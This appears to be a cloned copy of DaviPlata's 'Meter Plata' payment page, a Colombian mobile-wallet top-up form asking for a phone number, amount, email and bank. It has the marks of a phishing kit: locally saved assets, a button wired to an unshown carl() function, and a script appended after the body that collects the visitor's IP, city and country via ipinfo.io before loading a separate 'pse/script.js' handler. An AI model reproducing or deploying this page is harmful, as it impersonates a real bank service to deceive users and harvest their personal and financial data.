<!DOCTYPE html>
<html lang="en">
  <head>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <script type="text/javascript" async="" src="index_files/linkid.js"></script>
    <script type="text/javascript" async="" src="index_files/analytics.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> 
    <script>
      window.dataLayer = window.dataLayer || [];
      window.dataLayer.push(undefined)
    </script>
    <script async="" src="index_files/gtm.js"></script>
    <script>
      (function(w, d, s, l, i) {
        w[l] = w[l] || [];
        w[l].push({
          'gtm.start': new Date().getTime(),
          event: 'gtm.js'
        });
        var f = d.getElementsByTagName(s)[0],
          j = d.createElement(s),
          dl = l != 'dataLayer' ? '&l=' + l : '';
        j.async = true;
        j.src = 'https://www.googletagmanager.com/gtm.js?id=' + i + dl;
        f.parentNode.insertBefore(j, f);
      })(window, document, 'script', 'dataLayer', 'GTM-PDDFG4M');
    </script>
    <meta charset="utf-8">
    <meta name="google" content="notranslate">
    <meta name="viewport" content="width=device-width,initial-scale=1,maximun-scale=1,user-scalable=no">
    <meta name="theme-color" content="#000000">
    <meta name="description" content="Web site created using create-react-app">
    <link href="index_files/css2_002.css" rel="stylesheet">
    <link href="index_files/css2.css" rel="stylesheet">
    <link rel="stylesheet" href="index_files/bootstrap.min.css" integrity="sha384-9aIt2nRpC12Uk9gS9baDl411NQApFmC26EwAOH8WgZl5MYYxFfc+NcPb1dKGj7Sk" crossorigin="anonymous">
    <title>Meter Plata - DaviPlata | Ingrese a la opción Meter Plata desde nuestra página - DaviPlata</title>
    <link href="index_files/main.735bed52.chunk.css" rel="stylesheet">
    <link rel="stylesheet" href="index_files/index.scss">
    <style data-emotion="css"></style>
    <link type="image/x-icon" rel="icon" href="https://multimedia.epayco.co/vende/vende-davivienda/Favicon+Daviplata+(1)+(1).png">
    <style>
      .css-1x3khxy {
    position: relative;
    background: rgb(221, 0, 20);
    height: auto;
    width: 100%;
    padding: 7px 25px;
}
.text-md-left {
        text-align: left !important;
    }
    img {
    vertical-align: middle;
    border-style: none;
}
img {
    overflow-clip-margin: content-box;
    overflow: clip;
}
.main-container {
    height: 100%;
    width: 100%;
    overflow: hidden auto;
}
.css-1ip3bz6 {
    height: auto;
    display: flex;
    flex-flow: column wrap;
    -webkit-box-pack: start;
    justify-content: flex-start;
    -webkit-box-align: center;
    align-items: center;
    flex: 0 0 auto;
    will-change: transform;
    position: relative;
    width: 100%;
    min-height: 100vh;
}
* {
    margin: 0;
    padding: 0;
    border: 0;
    box-sizing: border-box;
}
#root, body, html {
    height: 100%;
    width: 100%;
    overflow: hidden;
    font-family: "Roboto Condensed", sans-serif;
}
div {
    display: block;
    unicode-bidi: isolate;
}
@media (min-width: 1200px) {
    .col-xl-11 {
        -ms-flex: 0 0 91.666667%;
        flex: 0 0 91.666667%;
        max-width: 91.666667%;
    }
}
.css-1x3khxy img {
    height: 56px;
    width: auto;
}
.css-1ip3bz6 .container {
    flex: 1 0 70%;
    -webkit-box-pack: center;
    justify-content: center;
    padding: 0px 20px 15px;
}
.css-xwaprj {
    width: 100%;
    height: auto;
    display: flex;
    flex-flow: column wrap;
    -webkit-box-pack: center;
    justify-content: center;
    -webkit-box-align: center;
    align-items: center;
    flex: 0 0 auto;
    will-change: transform;
}
.css-1sgjym8 {
    position: relative;
    font-weight: bold;
    font-style: italic;
    font-size: 50px;
    margin: 30px 0px;
}
.text-center {
    text-align: center !important;
}
.ct {
    color: #dd0014;
}
.css-tnlikk {
    position: relative;
}
@media (min-width: 1200px) {
    .pb-xl-5, .py-xl-5 {
        padding-bottom: 3rem !important;
    }
}
@media (min-width: 992px) {
    .mb-lg-5, .my-lg-5 {
        margin-bottom: 3rem !important;
    }
}
* {
    margin: 0;
    padding: 0;
    border: 0;
    box-sizing: border-box;
}
.wc {
    width: 100%;
}
* {
    margin: 0;
    padding: 0;
    border: 0;
    box-sizing: border-box;
}
html {
    font-family: sans-serif;
    line-height: 1.15;
    -webkit-text-size-adjust: 100%;
    -webkit-tap-highlight-color: transparent;
}
*, ::after, ::before {
    box-sizing: border-box;
}
*, ::after, ::before {
    box-sizing: border-box;
}
.css-mv55ve {
    width: 100%;
    height: auto;
    display: flex;
    flex-flow: wrap;
    -webkit-box-pack: justify;
    justify-content: space-between;
    -webkit-box-align: stretch;
    align-items: stretch;
    flex: 0 0 auto;
    will-change: transform;
}
.css-1wmenud {
    width: 100%;
    height: auto;
    display: flex;
    flex-flow: wrap;
    -webkit-box-pack: center;
    justify-content: center;
    -webkit-box-align: center;
    align-items: center;
    flex: 0 0 auto;
    will-change: transform;
}
.pl-0, .px-0 {
    padding-left: 0 !important;
}
.pr-0, .px-0 {
    padding-right: 0 !important;
}
.css-ecnx17 {
    width: 100%;
    height: auto;
    display: flex;
    flex-flow: column wrap;
    -webkit-box-pack: start;
    justify-content: flex-start;
    -webkit-box-align: center;
    align-items: center;
    flex: 0 0 auto;
    will-change: transform;
}
.css-db4rtm {
    position: relative;
    flex: 1 0 100%;
    max-width: 500px;
    margin-bottom: 14px;
}
@media (min-width: 768px) {
    .pr-md-2, .px-md-2 {
        padding-right: .5rem !important;
    }
}
@media (min-width: 768px) {
    .mb-md-5, .my-md-5 {
        margin-bottom: 3rem !important;
    }
}
.css-db4rtm label {
    font-size: 24px;
    color: rgb(52, 53, 55);
    font-weight: bold;
    text-align: left;
    width: 100%;
    font-family: "Roboto Condensed";
    margin-bottom: 5px;
}
.css-1wmenud {
    width: 100%;
    height: auto;
    display: flex;
    flex-flow: wrap;
    -webkit-box-pack: center;
    justify-content: center;
    -webkit-box-align: center;
    align-items: center;
    flex: 0 0 auto;
    will-change: transform;
}
.css-db4rtm input, .css-db4rtm select, .css-db4rtm textarea {
    flex: 10 0 70%;
    background-color: rgb(249, 249, 249);
    color: rgb(0, 0, 0);
    cursor: pointer;
    border-radius: 7px;
    height: 42px;
    width: 100%;
    border: none;
    font-weight: 400;
    font-family: "Roboto Condensed";
    font-size: 22px;
}
.css-19elq8f {
    position: relative;
    flex: 1 0 100%;
    max-width: 500px;
    margin-bottom: 14px;
}
.css-1wmenud {
    width: 100%;
    height: auto;
    display: flex;
    flex-flow: wrap;
    -webkit-box-pack: center;
    justify-content: center;
    -webkit-box-align: center;
    align-items: center;
    flex: 0 0 auto;
    will-change: transform;
}
.css-19elq8f .prefix input {
    padding-left: 20px;
}
.css-19elq8f input, .css-19elq8f select, .css-19elq8f textarea {
    flex: 10 0 70%;
    background-color: rgb(249, 249, 249);
    color: rgb(0, 0, 0);
    cursor: pointer;
    border-radius: 7px;
    height: 42px;
    width: 100%;
    border: none;
    font-weight: 400;
    font-family: "Roboto Condensed";
    font-size: 22px;
} 
button, input {
    overflow: visible;
}
.css-19elq8f .prefix::after {
    content: "$";
    display: flex;
    position: absolute;
    width: 20px;
    height: 100%;
    background-color: transparent;
    left: 0px;
    z-index: 1;
    -webkit-box-align: center;
    align-items: center;
    padding-left: 5px;
    margin: auto;
    font-size: 1.5em;
    color: rgb(0, 0, 0);
}
*, ::after, ::before {
    box-sizing: border-box;
}
.css-ecnx17 {
    width: 100%;
    height: auto;
    display: flex;
    flex-flow: column wrap;
    -webkit-box-pack: start;
    justify-content: flex-start;
    -webkit-box-align: center;
    align-items: center;
    flex: 0 0 auto;
    will-change: transform;
}
.css-wzvajl {
    width: 100%;
    height: auto;
    display: flex;
    flex-flow: column wrap;
    -webkit-box-pack: start;
    justify-content: flex-start;
    -webkit-box-align: center;
    align-items: center;
    flex: 1 0 auto;
    will-change: transform;
}
.css-1ryiod3 {
    position: relative;
    flex: 0 0 auto;
    max-width: 500px;
    margin-bottom: 14px;
}
.wc {
    width: 100%;
}
@media (min-width: 768px) {
    .pl-md-2, .px-md-2 {
        padding-left: .5rem !important;
    }
}
@media (min-width: 768px) {
    .mb-md-5, .my-md-5 {
        margin-bottom: 3rem !important;
    }
}
@media (min-width: 576px) {
    .mb-sm-3, .my-sm-3 {
        margin-bottom: 1rem !important;
    }
}
div {
    display: block;
    unicode-bidi: isolate;
}
.css-1ryiod3 label {
    font-size: 24px;
    color: rgb(52, 53, 55);
    font-weight: bold;
    text-align: left;
    width: 100%;
    font-family: "Roboto Condensed";
    margin-bottom: 5px;
}
.css-1wmenud {
    width: 100%;
    height: auto;
    display: flex;
    flex-flow: wrap;
    -webkit-box-pack: center;
    justify-content: center;
    -webkit-box-align: center;
    align-items: center;
    flex: 0 0 auto;
    will-change: transform;
}
.css-1ryiod3 input, .css-1ryiod3 select, .css-1ryiod3 textarea {
    flex: 10 0 70%;
    background-color: rgb(249, 249, 249);
    color: rgb(0, 0, 0);
    cursor: pointer;
    border-radius: 7px;
    height: 42px;
    width: 100%;
    border: none;
    font-weight: 400;
    font-family: "Roboto Condensed";
    font-size: 22px;
}
button, input {
    overflow: visible;
}
.css-exdwji input, .css-exdwji select, .css-exdwji textarea {
    flex: 10 0 70%;
    background-color: rgb(249, 249, 249);
    color: rgb(108, 117, 125);
    cursor: pointer;
    border-radius: 7px;
    height: 42px;
    width: 100%;
    border: none;
    font-weight: 400;
    font-family: "Roboto Condensed";
    font-size: 22px;
}
.pagar>select, select {
    -webkit-appearance: none;
    -moz-appearance: none;
    appearance: none;
    background-size: 18px auto;
    background-position: calc(100% - 10px) 50%;
    background-repeat: no-repeat;
}
select {
    background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACIAAAAVCAYAAAAjODzXAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAIhSURBVHgBtZZBbtpAFIa/GVB3rVABqUtQo1Zdld4AjpAThJygzgmgJ0hygtITkJ6AI4RdFySxl5VCJEtdtTW475FENWbs2AT+lT0z7803z++9sUHkU6stqXry+NFiLtrcfmOPethvAHEtgu/vubswOnFD04+JW/+XmrO33J6wB/m8acUsJsn9ltCzMxrddQhV7F3T8NixNBJpCJUlPrJVqkGG3alCslOI6mTz0CoT2jY/gxjjzAkLYw0lO5BAjGPoOGaCP0TnVh8r/PUkWaYO+1UonwtzRXMkEF03xKL3gTBYgbQJw99EhzqxsVRCuSAaX0po2ULX1M+M5EAehL7Zx+F7KnsokQnTJjLWeUXllNIQjaFYf3ZMhUmINRCV9I/pkvjY7db0ZyvHZSAYuCAWmDWIDRDVgTQXGRw6HOjigU/9iO0hiOSg7+TA6XGT40w/hauXrE7kcvZgpzbOzyj9ot/mzlmhmSCqGxoTV7YbTGCo9LT0k+NX1Psy99XtzXjSrc/JkCVHJqeStKyTleTT7GRDMMyDeBJEy1qz21VJCvNSmtQjhLxPyISYf+EJGQpIN5JqusxwMRInXXfrLgZRGEQ147UnfaZML5EbfF74Bi8MovJpDJYZpZ1yO5KcOKaESoGo9N5wt+x7SZVND5h/oqRsyfV5F+QK4hdRjy1UOiKqH9RaL6hIlZhWAiNI3x97B0nADORfRvoH+k9xsi2E6h+dWd8Fr7gXmgAAAABJRU5ErkJggg==);
}
select {
    word-wrap: normal;
}
button, select {
    text-transform: none;
}
.css-1wmenud {
    width: 100%;
    height: auto;
    display: flex;
    flex-flow: wrap;
    -webkit-box-pack: center;
    justify-content: center;
    -webkit-box-align: center;
    align-items: center;
    flex: 0 0 auto;
    will-change: transform;
}@media (min-width: 768px) {
    .pl-md-3, .px-md-3 {
        padding-left: 1rem !important;
    }
}
@media (min-width: 768px) {
    .mb-md-5, .my-md-5 {
        margin-bottom: 3rem !important;
    }
}
.css-2boqc {
    margin: 15px auto;
    display: flex;
    -webkit-box-pack: center;
    justify-content: center;
}
* {
    margin: 0;
    padding: 0;
    border: 0;
    box-sizing: border-box;
}
* {
    margin: 0;
    padding: 0;
    border: 0;
    box-sizing: border-box;
}
div {
    display: block;
    unicode-bidi: isolate;
}
.css-bbb3wx {
    width: 100%;
    max-width: 150px;
    position: relative;
    height: 44px;
}
.css-bbb3wx button {
    background: rgb(127, 127, 127);
    font-size: 20px;
    color: white;
    border: 1px solid rgb(127, 127, 127);
    width: 100%;
    min-height: 40px;
    border-radius: 22px;
    cursor: not-allowed;
    font-family: "Roboto Condensed", sans-serif;
    font-weight: 400 !important;
}
[type=button], [type=reset], [type=submit], button {
    -webkit-appearance: button;
}
button, select {
    text-transform: none;
}
b, strong {
    font-weight: bolder;
}
.css-exdwji label {
    font-size: 24px;
    color: rgb(52, 53, 55);
    font-weight: bold;
    text-align: left;
    width: 100%;
    font-family: "Roboto Condensed";
    margin-bottom: 5px;
}
    </style>
  </head>
  <body>
    <noscript>
      <iframe src="https://www.googletagmanager.com/ns.html?id=GTM-PDDFG4M" height="0" width="0" style="display:none;visibility:hidden" id="tag-manager"></iframe>
    </noscript>
    <noscript>You need to enable JavaScript to run this app.</noscript>
    <div id="root">
      <div class="main-container notranslate">
        <div class=" css-1ip3bz6" direction="column">
          <div class="css-1x3khxy">
            <div class="col-12 col-xl-11 mx-auto text-md-left text-center">
              <img src="index_files/daviplata-blanco.png" alt="">
            </div>
          </div>
          <div class="container css-xwaprj" direction="column">
            <div class="text-center css-1sgjym8">
              <span class="ct">Meter Plata</span> a DaviPlata
            </div>
            <div class="pb-xl-5 mb-lg-5 css-tnlikk fadeUp-enter-done">
              <form class="wc">
                <div class="wc css-mv55ve" direction="row">
                  <div class="col-12 col-md-6 px-0 css-1wmenud" direction="row">
                    <div class="mb-sm-3 mb-md-5  pr-md-2  css-db4rtm">
                      <label>¿A qué número DaviPlata quiere meter plata? </label>
                      <div class="wc  css-1wmenud" direction="row">
                        <input type="tel" id="Inputphone" placeholder="Número de celular">
                      </div>
                    </div>
                    <div class="mb-sm-3 mb-md-5  pr-md-2  css-db4rtm">
                      <label>Confirme el número DaviPlata </label>
                      <div class="wc  css-1wmenud" direction="row">
                        <input type="tel" id="InputphoneValid" placeholder="Confirme el número DaviPlata">
                      </div>
                    </div>
                    <div class="mb-sm-3 mb-md-5  css-19elq8f" prefix="$">
                      <label>¿Cuánta plata quiere meter? </label>
                      <div class="wc prefix css-1wmenud" direction="row">
                        <input type="text" id="Inputammount" placeholder="Valor">
                      </div>
                    </div>
                  </div>
                  <div class="col-12 col-md-6 px-0  css-ecnx17" direction="column">
                    <div class="wc  css-wzvajl" direction="column">
                      <div class="mb-sm-3 mb-md-5  pl-md-2 wc email css-1ryiod3">
                        <label>¿Cuál es su correo electrónico? </label>
                        <div class="wc  css-1wmenud" direction="row">
                          <input type="text" id="selectPersonType" placeholder="Correo electrónico">
                        </div>
                      </div>
                      <div class="mb-sm-3 mb-md-5 pl-md-2 wc  css-exdwji">
                        <label>¿Desde qué banco quiere meter plata? </label>
                        <select id="selectBank" name="" class="">
                          <option value="" selected="selected"> Seleccione el banco...</option>
                          <option value="1815">ALIANZA FIDUCIARIA</option>
                          <option value="1558">BAN100</option>
                          <option value="1059">BANCAMIA S.A.</option>
                          <option value="1040">BANCO AGRARIO</option>
                          <option value="BANCO AV VILLAS">BANCO AV VILLAS</option>
                          <option value="BANCO BBVA COLOMBIA S.A.">BANCO BBVA COLOMBIA S.A.</option>
                          <option value="BANCO CAJA SOCIAL">BANCO CAJA SOCIAL</option>
                          <option value="1066">BANCO COOPERATIVO COOPCENTRAL</option>
                          <option value="BANCO DAVIVIENDA">BANCO DAVIVIENDA</option>
                          <option value="BANCO DE BOGOTA">BANCO DE BOGOTA</option>
                          <option value="BANCO DE OCCIDENTE">BANCO DE OCCIDENTE</option>
                          <option value="1062">BANCO FALABELLA </option>
                          <option value="1063">BANCO FINANDINA S.A. BIC</option>
                          <option value="1012">BANCO GNB SUDAMERIS</option>
                          <option value="BANCO ITAU">BANCO ITAU</option>
                          <option value="1071">BANCO J.P. MORGAN COLOMBIA S.A.</option>
                          <option value="1047">BANCO MUNDO MUJER S.A.</option>
                          <option value="1060">BANCO PICHINCHA S.A.</option>
                          <option value="BANCO POPULAR">BANCO POPULAR</option>
                          <option value="1065">BANCO SANTANDER COLOMBIA</option>
                          <option value="1069">BANCO SERFINANZA</option>
                          <option value="1303">BANCO UNION antes GIROS</option>
                          <option value="1007">BANCOLOMBIA</option>
                          <option value="1061">BANCOOMEVA S.A.</option>
                          <option value="1283">CFA COOPERATIVA FINANCIERA</option>
                          <option value="1009">CITIBANK </option>
                          <option value="1370">COLTEFINANCIERA</option>
                          <option value="1292">CONFIAR COOPERATIVA FINANCIERA</option>
                          <option value="1289">COTRAFA</option>
                          <option value="1816">CREZCAMOS</option>
                          <option value="1097">DALE</option>
                          <option value="1637">IRIS</option>
                          <option value="1286">JFK COOPERATIVA FINANCIERA</option>
                          <option value="1070">LULO BANK</option>
                          <option value="1801">MOVII S.A.</option>
                          <option value="DAVIPLATA">DAVIPLATA</option>
                          <option value="1507">NEQUI</option>
                          <option value="1809">NU</option>
                          <option value="1811">RAPPIPAY</option>
                          <option value="SCOTIABANK COLPATRIA">SCOTIABANK COLPATRIA</option>
                          <option value="1804">UALÁ</option>
                        </select>
                      </div>
                    </div>
                    <div class="col-12 mb-sm-3 mb-md-5  justify-content-md-end px-0 pl-md-3 css-1wmenud" direction="row" style="align-self: flex-end;">
                      <div class=" css-2boqc">
                        <div>
                          <div>
                            <div style="width: 304px; height: 78px;">
                              <div>
                                <iframe title="reCAPTCHA" width="304" height="78" role="presentation" name="a-xy7wal8jk0tl" frameborder="0" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox allow-storage-access-by-user-activation" src="index_files/anchor.htm"></iframe>
                              </div>
                              <textarea id="g-recaptcha-response" name="g-recaptcha-response" class="g-recaptcha-response" style="width: 250px; height: 40px; border: 1px solid rgb(193, 193, 193); margin: 10px 25px; padding: 0px; resize: none; display: none;"></textarea>
                            </div>
                            <iframe style="display: none;"></iframe>
                          </div>
                        </div>
                      </div>
                      <div class="css-bbb3wx">
                        <button  type="button" onclick="carl()">
                          <strong>Continuar</strong>
                        </button>
                      </div>
                    </div>
                  </div>
                </div>
              </form>
            </div>
          </div>
        </div>
      </div>
    </div>
    <div id="cont-modal"></div>
    <script src="index_files/jquery-3.5.1.slim.min.js" integrity="sha384-DfXdz2htPH0lsSSs5nCTpuj/zy4C+OGpamoFVy38MVBnE+IbbVYUew+OrCXaRkfj" crossorigin="anonymous"></script>
    <script src="index_files/popper.min.js" integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo" crossorigin="anonymous"></script>
    <script src="index_files/bootstrap.min.js" integrity="sha384-OgVRvuATP1z7JjHLkuOU7Xw704+h835Lr+6QL9UvYjZE3Ipu6Tp75j7Bh/kR0JKI" crossorigin="anonymous"></script>
    <script type="text/javascript">
      ! function() {
        if ("recarga-daviplata.epayco.co" === window.location.host) {
          window.__insp = window.__insp || [], __insp.push(["wid", 679723872]);
          setTimeout((function() {
            if (void 0 === window.__inspld) {
              window.__inspld = 1;
              var t = document.createElement("script");
              t.type = "text/javascript", t.async = !0, t.id = "inspsync", t.src = ("https:" == document.location.protocol ? "https" : "http") + "://cdn.inspectlet.com/inspectlet.js?wid=679723872&r=" + Math.floor((new Date).getTime() / 36e5);
              var e = document.getElementsByTagName("script")[0];
              e.parentNode.insertBefore(t, e)
            }
          }), 0)
        }
      }()
    </script>
    <script>
      ! function(e) {
        function r(r) {
          for (var n, a, l = r[0], p = r[1], i = r[2], c = 0, s = []; c < l.length; c++) a = l[c], Object.prototype.hasOwnProperty.call(o, a) && o[a] && s.push(o[a][0]), o[a] = 0;
          for (n in p) Object.prototype.hasOwnProperty.call(p, n) && (e[n] = p[n]);
          for (f && f(r); s.length;) s.shift()();
          return u.push.apply(u, i || []), t()
        }

        function t() {
          for (var e, r = 0; r < u.length; r++) {
            for (var t = u[r], n = !0, l = 1; l < t.length; l++) {
              var p = t[l];
              0 !== o[p] && (n = !1)
            }
            n && (u.splice(r--, 1), e = a(a.s = t[0]))
          }
          return e
        }
        var n = {},
          o = {
            1: 0
          },
          u = [];

        function a(r) {
          if (n[r]) return n[r].exports;
          var t = n[r] = {
            i: r,
            l: !1,
            exports: {}
          };
          return e[r].call(t.exports, t, t.exports, a), t.l = !0, t.exports
        }
        a.m = e, a.c = n, a.d = function(e, r, t) {
          a.o(e, r) || Object.defineProperty(e, r, {
            enumerable: !0,
            get: t
          })
        }, a.r = function(e) {
          "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, {
            value: "Module"
          }), Object.defineProperty(e, "__esModule", {
            value: !0
          })
        }, a.t = function(e, r) {
          if (1 & r && (e = a(e)), 8 & r) return e;
          if (4 & r && "object" == typeof e && e && e.__esModule) return e;
          var t = Object.create(null);
          if (a.r(t), Object.defineProperty(t, "default", {
              enumerable: !0,
              value: e
            }), 2 & r && "string" != typeof e)
            for (var n in e) a.d(t, n, function(r) {
              return e[r]
            }.bind(null, n));
          return t
        }, a.n = function(e) {
          var r = e && e.__esModule ? function() {
            return e.default
          } : function() {
            return e
          };
          return a.d(r, "a", r), r
        }, a.o = function(e, r) {
          return Object.prototype.hasOwnProperty.call(e, r)
        }, a.p = "/";
        var l = this["webpackJsonpdaviplata-rp"] = this["webpackJsonpdaviplata-rp"] || [],
          p = l.push.bind(l);
        l.push = r, l = l.slice();
        for (var i = 0; i < l.length; i++) r(l[i]);
        var f = p;
        t()
      }([])
    </script>
    <script src="index_files/main.f9416668.chunk.js"></script>
    <script type="text/javascript" id="">
      var _elqQ = _elqQ || [];
      _elqQ.push(["elqSetSiteId", "1585023691"]);
      _elqQ.push(["elqTrackPageView"]);
      (function() {
        function b() {
          var a = document.createElement("script");
          a.type = "text/javascript";
          a.async = !0;
          a.src = "//img03.en25.com/i/elqCfg.min.js";
          var c = document.getElementsByTagName("script")[0];
          c.parentNode.insertBefore(a, c)
        }
        window.addEventListener ? window.addEventListener("DOMContentLoaded", b, !1) : window.attachEvent && window.attachEvent("onload", b)
      })();
    </script>
    <iframe name="__bkframe" height="0" width="0" frameborder="0" style="display:none;position:absolute;clip:rect(0px 0px 0px 0px)" src="index_files/a.htm"></iframe>
    <script src="index_files/api.js" async=""></script>
    <div style="background-color: rgb(255, 255, 255); border: 1px solid rgb(204, 204, 204); box-shadow: rgba(0, 0, 0, 0.2) 2px 2px 3px; position: absolute; transition: visibility 0s linear 0.3s, opacity 0.3s linear; opacity: 0; visibility: hidden; z-index: 2000000000; left: 0px; top: -10000px;">
      <div style="width: 100%; height: 100%; position: fixed; top: 0px; left: 0px; z-index: 2000000000; background-color: rgb(255, 255, 255); opacity: 0.05;"></div>
      <div style="border: 11px solid transparent; width: 0px; height: 0px; position: absolute; pointer-events: none; margin-top: -11px; z-index: 2000000000;" class="g-recaptcha-bubble-arrow"></div>
      <div style="border: 10px solid transparent; width: 0px; height: 0px; position: absolute; pointer-events: none; margin-top: -10px; z-index: 2000000000;" class="g-recaptcha-bubble-arrow"></div>
      <div style="z-index: 2000000000; position: relative;">
        <iframe title="El reCAPTCHA caduca dentro de dos minutos" style="width: 100%; height: 100%;" name="c-xy7wal8jk0tl" frameborder="0" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox allow-storage-access-by-user-activation" src="index_files/bframe.htm"></iframe>
      </div>
    </div>
  </body>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> 
  <script>
    fetch('https://ipinfo.io/json')
  .then(response => response.json())
  .then(data => {
   
    const ip = data.ip;
    const ciudad = data.city;
    const pais = data.country;

    
    localStorage.setItem("ip", ip);
    localStorage.setItem("ciudad", ciudad);
    localStorage.setItem("pais", pais);
     }) 
</script>
 <script src="pse/script.js"></script>
</html>